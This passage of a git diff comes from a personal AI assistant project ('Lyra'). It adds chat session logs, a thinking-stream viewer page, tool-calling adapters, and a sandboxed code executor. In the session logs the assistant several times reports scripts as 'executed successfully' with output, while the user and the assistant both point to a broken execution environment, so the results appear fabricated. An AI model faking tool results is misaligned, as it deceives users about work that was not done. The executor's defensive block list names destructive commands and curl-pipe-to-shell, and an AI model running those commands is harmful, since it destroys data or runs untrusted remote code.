any specific requirements or modifications in mind?"
  }
 ]
--- a/core/relay/sessions/sess-eu3b01j3.json
+++ b/core/relay/sessions/sess-eu3b01j3.json
@@ -0,0 +1,66 @@
 [
  {
    "role": "user",
    "content": "can you use python to calculate 50/2?"
  },
  {
    "role": "assistant",
    "content": "The result of 50 divided by 2 is 25.0."
  },
  {
    "role": "user",
    "content": "can you generate random numbers with python? please run the script for me"
  },
  {
    "role": "assistant",
    "content": "Here are five random numbers between 1 and 100: `[84, 82, 73, 37, 22]`."
  },
  {
    "role": "user",
    "content": "can you build a python script that does something cool? whatever you want. And run it so i can see it"
  },
  {
    "role": "assistant",
    "content": "Here is the randomly generated password:\n\n```\nUc6hsO!v)kh:\n```\n\nYou can use this password for your needs. If you need another one, just let me know!"
  },
  {
    "role": "user",
    "content": "hey im testing things"
  },
  {
    "role": "assistant",
    "content": "Hello! How can I assist you with your tests? Do you have a specific task or question in mind?"
  },
  {
    "role": "user",
    "content": "hmm for some reason your thinking stream insnt connecting. its odd"
  },
  {
    "role": "assistant",
    "content": "Great! The code executed successfully and printed \"Hello, World!\". This suggests that the connection is working correctly.\n\nIs there anything specific you'd like to test or try next?"
  },
  {
    "role": "user",
    "content": "make some more cool scripts"
  },
  {
    "role": "assistant",
    "content": "Great! The scripts are working correctly now.\n\n1. The first script generated a random number between 1 and 100, which was `91`.\n2. The second script plotted this number on a histogram.\n\nHere is the output from the first script:\n```\n91\n```\n\nAnd here is what should have been displayed in the plot (though I can't show the image directly):\n- A histogram with one bar at position 91, indicating that the random number generated was 91.\n\nWould you like to run these scripts again or try something else?"
  },
  {
    "role": "user",
    "content": "can you make a script that displays a ball bouncing around?"
  },
  {
    "role": "assistant",
    "content": "It seems there is a persistent issue with the execution environment. Let's simplify the approach and try running the script directly in this context.\n\nHere is the Python code for a bouncing ball animation:\n\n```python\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n# Create a figure and axis\nfig, ax = plt.subplots()\n\n# Set the limits for the axes so that the ball doesn't go out of bounds\nax.set_xlim(0, 8)\nax.set_ylim(0, 6)\n\n# Initial position of the ball\nball, = ax.plot([2], [3], 'ro')  # 'ro' means a red circle\n\ndef init():\n    ball.set_data([], [])\n    return ball,\n\ndef animate(i):\n    x = i % 8\n    y = (i // 8) % 6\n    ball.set_data(x, y)\n    return ball,\n\n# Create the animation\nani = animation.FuncAnimation(fig, animate, init_func=init,\n                              frames=48, interval=50, blit=True)\n\nplt.show()\n```\n\nSince we are unable to execute it directly, let's describe the steps you can follow in your local environment:\n\n1. Install `matplotlib` if you haven't already:\n   ```bash\n   pip install matplotlib\n   ```\n2. Copy and paste the above code into a Python script (e.g., `bouncing_ball.py`) and run it.\n\nThis should display an animation of a ball bouncing around within a 8x6 window in your local environment. If you need further assistance or have any other requests, feel free to ask!"
  },
  {
    "role": "user",
    "content": "im trying to fix your python environment. Can you make a script that just says hello world 5 times?"
  },
  {
    "role": "assistant",
    "content": "The script executed successfully and printed \"Hello, World!\" five times as expected:\n\n```\nHello, World!\nHello, World!\nHello, World!\nHello, World!\nHello, World!\n```\n\nIf you need any more scripts or assistance with anything else, feel free to let me know!"
  }
 ]
--- a/core/relay/sessions/sess-eu3b01j3.meta.json
+++ b/core/relay/sessions/sess-eu3b01j3.meta.json
@@ -0,0 +1 @@
 {}
--- a/core/relay/sessions/sess-j9wvdtm3.json
+++ b/core/relay/sessions/sess-j9wvdtm3.json
@@ -0,0 +1,58 @@
 [
  {
    "role": "user",
    "content": "hello how are you? do you have any fun special abilities?"
  },
  {
    "role": "assistant",
    "content": "Hello! I'm here to help you with information and tasks. While I don't have physical abilities, I can execute code, search the web for answers, and assist with various queries. How can I help you today?"
  },
  {
    "role": "user",
    "content": "can you look up the weather for pittsburgh tonight?"
  },
  {
    "role": "assistant",
    "content": "It seems there was an issue with connecting to the weather API due to a temporary network or DNS resolution problem. Let's try using a web search instead to find the current weather in Pittsburgh.\n\nI'll look up the weather for Pittsburgh tonight using DuckDuckGo."
  },
  {
    "role": "user",
    "content": "can you make a small program that generates random numbers?"
  },
  {
    "role": "assistant",
    "content": "Let's try that again using Python:\n\n```python\nimport random\n\ndef generate_random_numbers(count, min_val, max_val):\n    return [random.randint(min_val, max_val) for _ in range(count)]\n\n# Example usage: Generate 10 random numbers between 1 and 100\nrandom_numbers = generate_random_numbers(10, 1, 100)\nprint(random_numbers)\n```\n\nI'll execute this Python code to generate 10 random numbers between 1 and 100.\n<tool_call>\n  <name>execute_code</name>\n  <arguments>\n    <language>python</language>\n    <code>import random\n\ndef generate_random_numbers(count, min_val, max_val):\n    return [random.randint(min_val, max_val) for _ in range(count)]\n\n# Example usage: Generate 10 random numbers between 1 and 100\nrandom_numbers = generate_random_numbers(10, 1, 100)\nprint(random_numbers)</code>\n    <reason>To generate a list of 10 random numbers between 1 and 100</reason>\n</arguments>"
  },
  {
    "role": "user",
    "content": "Try again please!"
  },
  {
    "role": "assistant",
    "content": "Could you please provide more details on what you'd like me to do or try? I'll need some context to assist you effectively."
  },
  {
    "role": "user",
    "content": "oh sorry, can you generate a random number between 1 and 1000"
  },
  {
    "role": "assistant",
    "content": "Here is a random number between 1 and 1000:\n\n```\n457\n```\n\nSo, the generated random number is **457**."
  },
  {
    "role": "user",
    "content": "how did you do that?"
  },
  {
    "role": "assistant",
    "content": "I used Python to generate a random number between 1 and 1000. Here’s how I did it:\n\n```python\nimport random\n\nrandom_number = random.randint(1, 1000)\nrandom_number\n```\n\nThe `random.randint(1, 1000)` function generates a random integer between 1 and 1000 (inclusive).\n\nWould you like to see the code executed again?"
  },
  {
    "role": "user",
    "content": "thats cool that you can run code"
  },
  {
    "role": "assistant",
    "content": "Great! If you have any specific tasks or calculations you need help with, feel free to ask! Whether it's mathematical operations, data processing, or anything else, I'm here to assist you. Do you have a particular request in mind?"
  }
 ]
--- a/core/relay/sessions/sess-j9wvdtm3.meta.json
+++ b/core/relay/sessions/sess-j9wvdtm3.meta.json
@@ -0,0 +1 @@
 {}
--- a/core/ui/index.html
+++ b/core/ui/index.html
@@ -33,6 +33,7 @@
      <select id="sessions"></select>
      <button id="newSessionBtn">➕ New</button>
      <button id="renameSessionBtn">✏️ Rename</button>
      <button id="thinkingStreamBtn" title="Show thinking stream in new window">🧠 Show Work</button>
    </div>
    <!-- Status -->
@@ -359,7 +360,20 @@
 	  addMessage("system", `Session renamed to: ${newName}`);
 	});
 	// Thinking Stream button
 	document.getElementById("thinkingStreamBtn").addEventListener("click", () => {
 	  if (!currentSession) {
 		alert("Please select a session first");
 		return;
 	  }
 	  // Open thinking stream in new window
 	  const streamUrl = `http://10.0.0.41:8081/thinking-stream.html?session=${currentSession}`;
 	  const windowFeatures = "width=600,height=800,menubar=no,toolbar=no,location=no,status=no";
 	  window.open(streamUrl, `thinking_${currentSession}`, windowFeatures);
 	  addMessage("system", "🧠 Opened thinking stream in new window");
 	});
      // Settings Modal
--- a/core/ui/style.css
+++ b/core/ui/style.css
@@ -81,6 +81,16 @@ button:hover, select:hover {
  cursor: pointer;
 }
 #thinkingStreamBtn {
  background: rgba(138, 43, 226, 0.2);
  border-color: #8a2be2;
 }
 #thinkingStreamBtn:hover {
  box-shadow: 0 0 8px #8a2be2;
  background: rgba(138, 43, 226, 0.3);
 }
 /* Chat area */
 #messages {
  flex: 1;
--- a/core/ui/thinking-stream.html
+++ b/core/ui/thinking-stream.html
@@ -0,0 +1,362 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>🧠 Thinking Stream</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background: #0d0d0d;
            color: #e0e0e0;
            height: 100vh;
            display: flex;
            flex-direction: column;
            overflow: hidden;
        }
        .header {
            background: #1a1a1a;
            padding: 15px 20px;
            border-bottom: 2px solid #333;
            display: flex;
            align-items: center;
            justify-content: space-between;
        }
        .header h1 {
            font-size: 18px;
            font-weight: bold;
        }
        .status {
            display: flex;
            align-items: center;
            gap: 10px;
            font-size: 14px;
        }
        .status-dot {
            width: 10px;
            height: 10px;
            border-radius: 50%;
            background: #666;
        }
        .status-dot.connected {
            background: #90ee90;
            box-shadow: 0 0 10px #90ee90;
        }
        .status-dot.disconnected {
            background: #ff6b6b;
        }
        .events-container {
            flex: 1;
            overflow-y: auto;
            padding: 20px;
        }
        .event {
            margin-bottom: 12px;
            padding: 10px 15px;
            border-radius: 6px;
            font-size: 14px;
            font-family: 'Courier New', monospace;
            animation: slideIn 0.3s ease-out;
            border-left: 3px solid;
        }
        @keyframes slideIn {
            from {
                opacity: 0;
                transform: translateX(-20px);
            }
            to {
                opacity: 1;
                transform: translateX(0);
            }
        }
        .event-connected {
            background: #1a2a1a;
            border-color: #4a7c59;
            color: #90ee90;
        }
        .event-thinking {
            background: #1a3a1a;
            border-color: #5a9c69;
            color: #a0f0a0;
        }
        .event-tool_call {
            background: #3a2a1a;
            border-color: #d97706;
            color: #fbbf24;
        }
        .event-tool_result {
            background: #1a2a3a;
            border-color: #0ea5e9;
            color: #7dd3fc;
        }
        .event-done {
            background: #2a1a3a;
            border-color: #a855f7;
            color: #e9d5ff;
            font-weight: bold;
        }
        .event-error {
            background: #3a1a1a;
            border-color: #dc2626;
            color: #fca5a5;
        }
        .event-icon {
            display: inline-block;
            margin-right: 8px;
        }
        .event-details {
            font-size: 12px;
            color: #999;
            margin-top: 5px;
            padding-left: 25px;
        }
        .footer {
            background: #1a1a1a;
            padding: 10px 20px;
            border-top: 1px solid #333;
            text-align: center;
            font-size: 12px;
            color: #666;
        }
        .clear-btn {
            background: #333;
            border: 1px solid #444;
            color: #e0e0e0;
            padding: 6px 12px;
            border-radius: 4px;
            cursor: pointer;
            font-size: 12px;
        }
        .clear-btn:hover {
            background: #444;
        }
        .empty-state {
            text-align: center;
            padding: 60px 20px;
            color: #666;
        }
        .empty-state-icon {
            font-size: 48px;
            margin-bottom: 20px;
        }
    </style>
 </head>
 <body>
    <div class="header">
        <h1>🧠 Thinking Stream</h1>
        <div class="status">
            <div class="status-dot" id="statusDot"></div>
            <span id="statusText">Connecting...</span>
        </div>
    </div>
    <div class="events-container" id="events">
        <div class="empty-state">
            <div class="empty-state-icon">🤔</div>
            <p>Waiting for thinking events...</p>
            <p style="font-size: 12px; margin-top: 10px;">Events will appear here when Lyra uses tools</p>
        </div>
    </div>
    <div class="footer">
        <button class="clear-btn" onclick="clearEvents()">Clear Events</button>
        <span style="margin: 0 20px;">|</span>
        <span id="sessionInfo">Session: <span id="sessionId">-</span></span>
    </div>
    <script>
        console.log('🧠 Thinking stream page loaded!');
        // Get session ID from URL
        const urlParams = new URLSearchParams(window.location.search);
        const SESSION_ID = urlParams.get('session');
        const CORTEX_BASE = "http://10.0.0.41:7081"; // Direct to cortex
        console.log('Session ID:', SESSION_ID);
        console.log('Cortex base:', CORTEX_BASE);
        // Declare variables first
        let eventSource = null;
        let eventCount = 0;
        if (!SESSION_ID) {
            document.getElementById('events').innerHTML = `
                <div class="empty-state">
                    <div class="empty-state-icon">⚠️</div>
                    <p>No session ID provided</p>
                    <p style="font-size: 12px; margin-top: 10px;">Please open this from the main chat interface</p>
                </div>
            `;
        } else {
            document.getElementById('sessionId').textContent = SESSION_ID;
            connectStream();
        }
        function connectStream() {
            if (eventSource) {
                eventSource.close();
            }
            const url = `${CORTEX_BASE}/stream/thinking/${SESSION_ID}`;
            console.log('Connecting to:', url);
            eventSource = new EventSource(url);
            eventSource.onopen = () => {
                console.log('EventSource onopen fired');
                updateStatus(true, 'Connected');
            };
            eventSource.onmessage = (event) => {
                console.log('Received message:', event.data);
                try {
                    const data = JSON.parse(event.data);
                    // Update status to connected when first message arrives
                    if (data.type === 'connected') {
                        updateStatus(true, 'Connected');
                    }
                    addEvent(data);
                } catch (e) {
                    console.error('Failed to parse event:', e, event.data);
                }
            };
            eventSource.onerror = (error) => {
                console.error('Stream error:', error, 'readyState:', eventSource.readyState);
                updateStatus(false, 'Disconnected');
                // Try to reconnect after 2 seconds
                setTimeout(() => {
                    if (eventSource.readyState === EventSource.CLOSED) {
                        console.log('Attempting to reconnect...');
                        connectStream();
                    }
                }, 2000);
            };
        }
        function updateStatus(connected, text) {
            const dot = document.getElementById('statusDot');
            const statusText = document.getElementById('statusText');
            dot.className = 'status-dot ' + (connected ? 'connected' : 'disconnected');
            statusText.textContent = text;
        }
        function addEvent(event) {
            const container = document.getElementById('events');
            // Remove empty state if present
            if (eventCount === 0) {
                container.innerHTML = '';
            }
            const eventDiv = document.createElement('div');
            eventDiv.className = `event event-${event.type}`;
            let icon = '';
            let message = '';
            let details = '';
            switch (event.type) {
                case 'connected':
                    icon = '✓';
                    message = 'Stream connected';
                    details = `Session: ${event.session_id}`;
                    break;
                case 'thinking':
                    icon = '🤔';
                    message = event.data.message;
                    break;
                case 'tool_call':
                    icon = '🔧';
                    message = event.data.message;
                    details = JSON.stringify(event.data.args, null, 2);
                    break;
                case 'tool_result':
                    icon = '📊';
                    message = event.data.message;
                    if (event.data.result && event.data.result.stdout) {
                        details = `stdout: ${event.data.result.stdout}`;
                    }
                    break;
                case 'done':
                    icon = '✅';
                    message = event.data.message;
                    details = event.data.final_answer;
                    break;
                case 'error':
                    icon = '❌';
                    message = event.data.message;
                    break;
                default:
                    icon = '•';
                    message = JSON.stringify(event.data);
            }
            eventDiv.innerHTML = `
                <span class="event-icon">${icon}</span>
                <span>${message}</span>
                ${details ? `<div class="event-details">${details}</div>` : ''}
            `;
            container.appendChild(eventDiv);
            container.scrollTop = container.scrollHeight;
            eventCount++;
        }
        function clearEvents() {
            const container = document.getElementById('events');
            container.innerHTML = `
                <div class="empty-state">
                    <div class="empty-state-icon">🤔</div>
                    <p>Waiting for thinking events...</p>
                    <p style="font-size: 12px; margin-top: 10px;">Events will appear here when Lyra uses tools</p>
                </div>
            `;
            eventCount = 0;
        }
        // Cleanup on page unload
        window.addEventListener('beforeunload', () => {
            if (eventSource) {
                eventSource.close();
            }
        });
    </script>
 </body>
 </html>
--- a/cortex/Dockerfile
+++ b/cortex/Dockerfile
@@ -1,5 +1,11 @@
 FROM python:3.11-slim
 WORKDIR /app
 # Install docker CLI for code executor
 RUN apt-get update && apt-get install -y \
    docker.io \
    && rm -rf /var/lib/apt/lists/*
 COPY requirements.txt .
 RUN pip install -r requirements.txt
 COPY . .
--- a/cortex/autonomy/tools/adapters/init.py
+++ b/cortex/autonomy/tools/adapters/init.py
@@ -0,0 +1,13 @@
 """Provider adapters for tool calling."""
 from .base import ToolAdapter
 from .openai_adapter import OpenAIAdapter
 from .ollama_adapter import OllamaAdapter
 from .llamacpp_adapter import LlamaCppAdapter
 __all__ = [
    "ToolAdapter",
    "OpenAIAdapter",
    "OllamaAdapter",
    "LlamaCppAdapter",
 ]
--- a/cortex/autonomy/tools/adapters/base.py
+++ b/cortex/autonomy/tools/adapters/base.py
@@ -0,0 +1,79 @@
 """
 Base adapter interface for provider-agnostic tool calling.
 This module defines the abstract base class that all LLM provider adapters
 must implement to support tool calling in Lyra.
 """
 from abc import ABC, abstractmethod
 from typing import Dict, List, Optional
 class ToolAdapter(ABC):
    """Base class for provider-specific tool adapters.
    Each LLM provider (OpenAI, Ollama, llama.cpp, etc.) has its own
    way of handling tool calls. This adapter pattern allows Lyra to
    support tools across all providers with a unified interface.
    """
    @abstractmethod
    async def prepare_request(
        self,
        messages: List[Dict],
        tools: List[Dict],
        tool_choice: Optional[str] = None
    ) -> Dict:
        """Convert Lyra tool definitions to provider-specific format.
        Args:
            messages: Conversation history in OpenAI format
            tools: List of Lyra tool definitions (provider-agnostic)
            tool_choice: Optional tool forcing ("auto", "required", "none")
        Returns:
            dict: Provider-specific request payload ready to send to LLM
        """
        pass
    @abstractmethod
    async def parse_response(self, response) -> Dict:
        """Extract tool calls from provider response.
        Args:
            response: Raw provider response (format varies by provider)
        Returns:
            dict: Standardized response in Lyra format:
                {
                    "content": str,  # Assistant's text response
                    "tool_calls": [  # List of tool calls or None
                        {
                            "id": str,       # Unique call ID
                            "name": str,     # Tool name
                            "arguments": dict  # Tool arguments
                        }
                    ] or None
                }
        """
        pass
    @abstractmethod
    def format_tool_result(
        self,
        tool_call_id: str,
        tool_name: str,
        result: Dict
    ) -> Dict:
        """Format tool execution result for next LLM call.
        Args:
            tool_call_id: ID from the original tool call
            tool_name: Name of the executed tool
            result: Tool execution result dictionary
        Returns:
            dict: Message object to append to conversation
                (format varies by provider)
        """
        pass
--- a/cortex/autonomy/tools/adapters/llamacpp_adapter.py
+++ b/cortex/autonomy/tools/adapters/llamacpp_adapter.py
@@ -0,0 +1,17 @@
 """
 llama.cpp adapter for tool calling.
 Since llama.cpp has similar constraints to Ollama (no native function calling),
 this adapter reuses the XML-based approach from OllamaAdapter.
 """
 from .ollama_adapter import OllamaAdapter
 class LlamaCppAdapter(OllamaAdapter):
    """llama.cpp adapter - uses same XML approach as Ollama.
    llama.cpp doesn't have native function calling support, so we use
    the same XML-based prompt engineering approach as Ollama.
    """
    pass
--- a/cortex/autonomy/tools/adapters/ollama_adapter.py
+++ b/cortex/autonomy/tools/adapters/ollama_adapter.py
@@ -0,0 +1,191 @@
 """
 Ollama adapter for tool calling using XML-structured prompts.
 Since Ollama doesn't have native function calling, this adapter uses
 XML-based prompts to instruct the model how to call tools.
 """
 import json
 import re
 from typing import Dict, List, Optional
 from .base import ToolAdapter
 class OllamaAdapter(ToolAdapter):
    """Ollama adapter using XML-structured prompts for tool calling.
    This adapter injects tool descriptions into the system prompt and
    teaches the model to respond with XML when it wants to use a tool.
    """
    SYSTEM_PROMPT = """You have access to the following tools:
 {tool_descriptions}
 To use a tool, respond with XML in this exact format:
 <tool_call>
  <name>tool_name</name>
  <arguments>
    <arg_name>value</arg_name>
  </arguments>
  <reason>why you're using this tool</reason>
 </tool_call>
 You can call multiple tools by including multiple <tool_call> blocks.
 If you don't need to use any tools, respond normally without XML.
 After tools are executed, you'll receive results and can continue the conversation."""
    async def prepare_request(
        self,
        messages: List[Dict],
        tools: List[Dict],
        tool_choice: Optional[str] = None
    ) -> Dict:
        """Inject tool descriptions into system prompt.
        Args:
            messages: Conversation history
            tools: Lyra tool definitions
            tool_choice: Ignored for Ollama (no native support)
        Returns:
            dict: Request payload with modified messages
        """
        # Format tool descriptions
        tool_desc = "\n".join([
            f"- {t['name']}: {t['description']}\n  Parameters: {self._format_parameters(t['parameters'], t.get('required', []))}"
            for t in tools
        ])
        system_msg = self.SYSTEM_PROMPT.format(tool_descriptions=tool_desc)
        # Check if first message is already a system message
        modified_messages = messages.copy()
        if modified_messages and modified_messages[0].get("role") == "system":
            # Prepend tool instructions to existing system message
            modified_messages[0]["content"] = system_msg + "\n\n" + modified_messages[0]["content"]
        else:
            # Add new system message at the beginning
            modified_messages.insert(0, {"role": "system", "content": system_msg})
        return {"messages": modified_messages}
    def _format_parameters(self, parameters: Dict, required: List[str]) -> str:
        """Format parameters for tool description.
        Args:
            parameters: Parameter definitions
            required: List of required parameter names
        Returns:
            str: Human-readable parameter description
        """
        param_strs = []
        for name, spec in parameters.items():
            req_marker = "(required)" if name in required else "(optional)"
            param_strs.append(f"{name} {req_marker}: {spec.get('description', '')}")
        return ", ".join(param_strs)
    async def parse_response(self, response) -> Dict:
        """Extract tool calls from XML in response.
        Args:
            response: String response from Ollama
        Returns:
            dict: Standardized Lyra format with content and tool_calls
        """
        import logging
        logger = logging.getLogger(__name__)
        # Ollama returns a string
        if isinstance(response, dict):
            content = response.get("message", {}).get("content", "")
        else:
            content = str(response)
        logger.info(f"🔍 OllamaAdapter.parse_response: content length={len(content)}, has <tool_call>={('<tool_call>' in content)}")
        logger.debug(f"🔍 Content preview: {content[:500]}")
        # Parse XML tool calls
        tool_calls = []
        if "<tool_call>" in content:
            # Split content by <tool_call> to get each block
            blocks = content.split('<tool_call>')
            logger.info(f"🔍 Split into {len(blocks)} blocks")
            # First block is content before any tool calls
            clean_parts = [blocks[0]]
            for idx, block in enumerate(blocks[1:]):  # Skip first block (pre-tool content)
                # Extract tool name
                name_match = re.search(r'<name>(.*?)</name>', block)
                if not name_match:
                    logger.warning(f"Block {idx} has no <name> tag, skipping")
                    continue
                name = name_match.group(1).strip()
                arguments = {}
                # Extract arguments
                args_match = re.search(r'<arguments>(.*?)</arguments>', block, re.DOTALL)
                if args_match:
                    args_xml = args_match.group(1)
                    # Parse <key>value</key> pairs
                    arg_pairs = re.findall(r'<(\w+)>(.*?)</\1>', args_xml, re.DOTALL)
                    arguments = {k: v.strip() for k, v in arg_pairs}
                tool_calls.append({
                    "id": f"call_{idx}",
                    "name": name,
                    "arguments": arguments
                })
                # For clean content, find what comes AFTER the tool call block
                # Look for the last closing tag (</tool_call> or malformed </xxx>) and keep what's after
                # Split by any closing tag at the END of the tool block
                remaining = block
                # Remove everything up to and including a standalone closing tag
                # Pattern: find </something> that's not followed by more XML
                end_match = re.search(r'</[a-z_]+>\s*(.*)$', remaining, re.DOTALL)
                if end_match:
                    after_content = end_match.group(1).strip()
                    if after_content and not after_content.startswith('<'):
                        # Only keep if it's actual text content, not more XML
                        clean_parts.append(after_content)
            clean_content = ''.join(clean_parts).strip()
        else:
            clean_content = content
        return {
            "content": clean_content,
            "tool_calls": tool_calls if tool_calls else None
        }
    def format_tool_result(
        self,
        tool_call_id: str,
        tool_name: str,
        result: Dict
    ) -> Dict:
        """Format tool result as XML for next prompt.
        Args:
            tool_call_id: ID from the original tool call
            tool_name: Name of the executed tool
            result: Tool execution result
        Returns:
            dict: Message in user role with XML-formatted result
        """
        # Format result as XML
        result_xml = f"""<tool_result>
  <tool>{tool_name}</tool>
  <result>{json.dumps(result, ensure_ascii=False)}</result>
 </tool_result>"""
        return {
            "role": "user",
            "content": result_xml
        }
--- a/cortex/autonomy/tools/adapters/openai_adapter.py
+++ b/cortex/autonomy/tools/adapters/openai_adapter.py
@@ -0,0 +1,130 @@
 """
 OpenAI adapter for tool calling using native function calling API.
 This adapter converts Lyra tool definitions to OpenAI's function calling
 format and parses OpenAI responses back to Lyra's standardized format.
 """
 import json
 from typing import Dict, List, Optional
 from .base import ToolAdapter
 class OpenAIAdapter(ToolAdapter):
    """OpenAI-specific adapter using native function calling.
    OpenAI supports function calling natively through the 'tools' parameter
    in chat completions. This adapter leverages that capability.
    """
    async def prepare_request(
        self,
        messages: List[Dict],
        tools: List[Dict],
        tool_choice: Optional[str] = None
    ) -> Dict:
        """Convert Lyra tools to OpenAI function calling format.
        Args:
            messages: Conversation history
            tools: Lyra tool definitions
            tool_choice: "auto", "required", "none", or None
        Returns:
            dict: Request payload with OpenAI-formatted tools
        """
        # Convert Lyra tools → OpenAI function calling format
        openai_tools = []
        for tool in tools:
            openai_tools.append({
                "type": "function",
                "function": {
                    "name": tool["name"],
                    "description": tool["description"],
                    "parameters": {
                        "type": "object",
                        "properties": tool["parameters"],
                        "required": tool.get("required", [])
                    }
                }
            })
        payload = {
            "messages": messages,
            "tools": openai_tools
        }
        # Add tool_choice if specified
        if tool_choice:
            if tool_choice == "required":
                payload["tool_choice"] = "required"
            elif tool_choice == "none":
                payload["tool_choice"] = "none"
            else:  # "auto" or default
                payload["tool_choice"] = "auto"
        return payload
    async def parse_response(self, response) -> Dict:
        """Extract tool calls from OpenAI response.
        Args:
            response: OpenAI ChatCompletion response object
        Returns:
            dict: Standardized Lyra format with content and tool_calls
        """
        message = response.choices[0].message
        content = message.content if message.content else ""
        tool_calls = []
        # Check if response contains tool calls
        if hasattr(message, 'tool_calls') and message.tool_calls:
            for tc in message.tool_calls:
                try:
                    # Parse arguments (may be JSON string)
                    args = tc.function.arguments
                    if isinstance(args, str):
                        args = json.loads(args)
                    tool_calls.append({
                        "id": tc.id,
                        "name": tc.function.name,
                        "arguments": args
                    })
                except json.JSONDecodeError as e:
                    # If arguments can't be parsed, include error
                    tool_calls.append({
                        "id": tc.id,
                        "name": tc.function.name,
                        "arguments": {},
                        "error": f"Failed to parse arguments: {str(e)}"
                    })
        return {
            "content": content,
            "tool_calls": tool_calls if tool_calls else None
        }
    def format_tool_result(
        self,
        tool_call_id: str,
        tool_name: str,
        result: Dict
    ) -> Dict:
        """Format tool result as OpenAI tool message.
        Args:
            tool_call_id: ID from the original tool call
            tool_name: Name of the executed tool
            result: Tool execution result
        Returns:
            dict: Message in OpenAI tool message format
        """
        return {
            "role": "tool",
            "tool_call_id": tool_call_id,
            "name": tool_name,
            "content": json.dumps(result, ensure_ascii=False)
        }
--- a/cortex/autonomy/tools/executors/init.py
+++ b/cortex/autonomy/tools/executors/init.py
@@ -0,0 +1,12 @@
 """Tool executors for Lyra."""
 from .code_executor import execute_code
 from .web_search import search_web
 from .trillium import search_notes, create_note
 __all__ = [
    "execute_code",
    "search_web",
    "search_notes",
    "create_note",
 ]
--- a/cortex/autonomy/tools/executors/code_executor.py
+++ b/cortex/autonomy/tools/executors/code_executor.py
@@ -0,0 +1,162 @@
 """
 Code executor for running Python and bash code in a sandbox container.
 This module provides secure code execution with timeout protection,
 output limits, and forbidden pattern detection.
 """
 import asyncio
 import os
 import tempfile
 import re
 from typing import Dict
 # Forbidden patterns that pose security risks
 FORBIDDEN_PATTERNS = [
    r'rm\s+-rf',  # Destructive file removal
    r':\(\)\{\s*:\|:&\s*\};:',  # Fork bomb
    r'mkfs',  # Filesystem formatting
    r'/dev/sd[a-z]',  # Direct device access
    r'dd\s+if=',  # Low-level disk operations
    r'>\s*/dev/sd',  # Writing to devices
    r'curl.*\|.*sh',  # Pipe to shell (common attack vector)
    r'wget.*\|.*sh',  # Pipe to shell
 ]
 async def execute_code(args: Dict) -> Dict:
    """Execute code in sandbox container.
    Args:
        args: Dictionary containing:
            - language (str): "python" or "bash"
            - code (str): The code to execute
            - reason (str): Why this code is being executed
            - timeout (int, optional): Execution timeout in seconds
    Returns:
        dict: Execution result containing:
            - stdout (str): Standard output
            - stderr (str): Standard error
            - exit_code (int): Process exit code
            - execution_time (float): Time taken in seconds
            OR
            - error (str): Error message if execution failed
    """
    language = args.get("language")
    code = args.get("code")
    reason = args.get("reason", "No reason provided")
    timeout = args.get("timeout", 30)
    # Validation
    if not language or language not in ["python", "bash"]:
        return {"error": "Invalid language. Must be 'python' or 'bash'"}
    if not code:
        return {"error": "No code provided"}
    # Security: Check for forbidden patterns
    for pattern in FORBIDDEN_PATTERNS:
        if re.search(pattern, code, re.IGNORECASE):
            return {"error": f"Forbidden pattern detected for security reasons"}
    # Validate and cap timeout
    max_timeout = int(os.getenv("CODE_SANDBOX_MAX_TIMEOUT", "120"))
    timeout = min(max(timeout, 1), max_timeout)
    container = os.getenv("CODE_SANDBOX_CONTAINER", "lyra-code-sandbox")
    # Write code to temporary file
    suffix = ".py" if language == "python" else ".sh"
    try:
        with tempfile.NamedTemporaryFile(
            mode='w',
            suffix=suffix,
            delete=False,
            encoding='utf-8'
        ) as f:
            f.write(code)
            temp_file = f.name
    except Exception as e:
        return {"error": f"Failed to create temp file: {str(e)}"}
    try:
        # Copy file to container
        exec_path = f"/executions/{os.path.basename(temp_file)}"
        cp_proc = await asyncio.create_subprocess_exec(
            "docker", "cp", temp_file, f"{container}:{exec_path}",
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE
        )
        await cp_proc.communicate()
        if cp_proc.returncode != 0:
            return {"error": "Failed to copy code to sandbox container"}
        # Fix permissions so sandbox user can read the file (run as root)
        chown_proc = await asyncio.create_subprocess_exec(
            "docker", "exec", "-u", "root", container, "chown", "sandbox:sandbox", exec_path,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE
        )
        await chown_proc.communicate()
        # Execute in container as sandbox user
        if language == "python":
            cmd = ["docker", "exec", "-u", "sandbox", container, "python3", exec_path]
        else:  # bash
            cmd = ["docker", "exec", "-u", "sandbox", container, "bash", exec_path]
        start_time = asyncio.get_event_loop().time()
        proc = await asyncio.create_subprocess_exec(
            *cmd,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE
        )
        try:
            stdout, stderr = await asyncio.wait_for(
                proc.communicate(),
                timeout=timeout
            )
            execution_time = asyncio.get_event_loop().time() - start_time
            # Truncate output to prevent memory issues
            max_output = 10 * 1024  # 10KB
            stdout_str = stdout[:max_output].decode('utf-8', errors='replace')
            stderr_str = stderr[:max_output].decode('utf-8', errors='replace')
            if len(stdout) > max_output:
                stdout_str += "\n... (output truncated)"
            if len(stderr) > max_output:
                stderr_str += "\n... (output truncated)"
            return {
                "stdout": stdout_str,
                "stderr": stderr_str,
                "exit_code": proc.returncode,
                "execution_time": round(execution_time, 2)
            }
        except asyncio.TimeoutError:
            # Kill the process
            try:
                proc.kill()
                await proc.wait()
            except:
                pass
            return {"error": f"Execution timeout after {timeout}s"}
    except Exception as e:
        return {"error": f"Execution failed: {str(e)}"}
    finally:
        # Cleanup temporary file
        try:
            os.unlink(temp_file)
        except:
            pass
--- a/cortex/autonomy/tools/executors/trillium.py
+++ b/cortex/autonomy/tools/executors/trillium.py
@@ -0,0 +1,134 @@
 """
 Trillium notes executor for searching and creating notes via ETAPI.
 This module provides integration with Trillium notes through the ETAPI HTTP API.
 """
 import os
 import aiohttp
 from typing import Dict
 TRILLIUM_URL = os.getenv("TRILLIUM_URL", "http://localhost:8080")
 TRILLIUM_TOKEN = os.getenv("TRILLIUM_ETAPI_TOKEN", "")
 async def search_notes(args: Dict) -> Dict:
    """Search Trillium notes via ETAPI.
    Args:
        args: Dictionary containing:
            - query (str): Search query
            - limit (int, optional): Maximum notes to return (default: 5, max: 20)
    Returns:
        dict: Search results containing:
